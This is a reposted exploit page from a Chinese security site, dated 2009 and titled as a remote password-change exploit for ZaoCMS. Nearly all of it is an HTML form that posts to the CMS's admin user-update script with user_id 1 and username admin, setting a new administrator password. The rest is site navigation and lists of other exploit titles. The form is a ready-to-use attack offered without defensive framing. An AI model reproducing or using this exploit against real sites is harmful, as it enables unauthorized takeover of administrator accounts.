首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
ZaoCMS (user_updated.php) Remote Change Password Exploit
来源:www.vfcocus.net 作者:g0bL!N 发布时间:2009-05-25  
<form
action="http://demo.zaocms.com/admin/modules/Users/user_updated.php"
method="post" onsubmit="return checkForm(this);" id=form1 Name=form1>
  <h2>Cod[3] By ThE g0bL!N ZaoCMS Remote Change Password
 </h2>
<tittle> ThE g0bL!N</tittle>
  
  <table cellSpacing="0" cellPadding="0" width="100%" border="0">
  <tr><td width="350">
<input type="hidden" name="user_id" value="1" />
  <table cellSpacing="0" cellPadding="0" width="350" class="form_table2"
border="0">
  <tr><td colspan="2" class="grey_bg">
<h4><strong>Contact/Login Info</strong></h4>
  </td></tr><tr><td width="100"
height="20"><strong>Username*</strong></td><td width="100" height="20">
<strong>admin</strong><input name="username" type="hidden"  value="admin"
/>
  </td></tr><tr><td width="100"
height="20"><strong>Password*</strong></td><td width="100" height="20">
<input name="password" type="text" id="password" value="za0" size="20" />
  </td></tr><tr><td width="100" height="20"><strong>Real
Name*</strong></td><td width="100" height="20">
<input name="realname" type="text" value="ZaoCMS Demo Admin" size="20">
  </td></tr>
<tr><td width="100" height="20"><strong>Email</strong><br />
  &nbsp; </td><td width="100" height="20">
    <input name="email" type="text" id="email" value="test@test.com" size="20"
/>
  </td></tr><tr><td width="100" height="20"><strong>Phone</strong></td><td
width="100" height="20">
<p>
 <input type="checkbox" checked="checked" name="is_admin" value="y"
disabled /> Site Administrator Priveleges <p>   
    &nbsp;
  <input type="hidden" name="redir" value="" />
    <input type="submit" value="Save Changes" id="submit" name="submit"
class="s" />
  </p></td></tr>
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Winamp <= 5.55 (MAKI script) U
·Winamp <= 5.55 (MAKI script) U
·Winamp 5.551 MAKI Parsing Inte
·Mole Group Sky Hunter/Bus Tick
·Microsoft IIS 6.0 WebDAV Remot
·ChinaGames (CGAgent.dll) Activ
·Article Directory (Auth Bypass
·Soulseek 157 NS */ 156.* Remot
·Job Script 2.0 Arbitrary Shell
·MiniTwitter 0.3-Beta (SQL/XSS)
·Flash Quiz Beta 2 Multiple Re
·Joomla Boy Scout Advancement 0
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved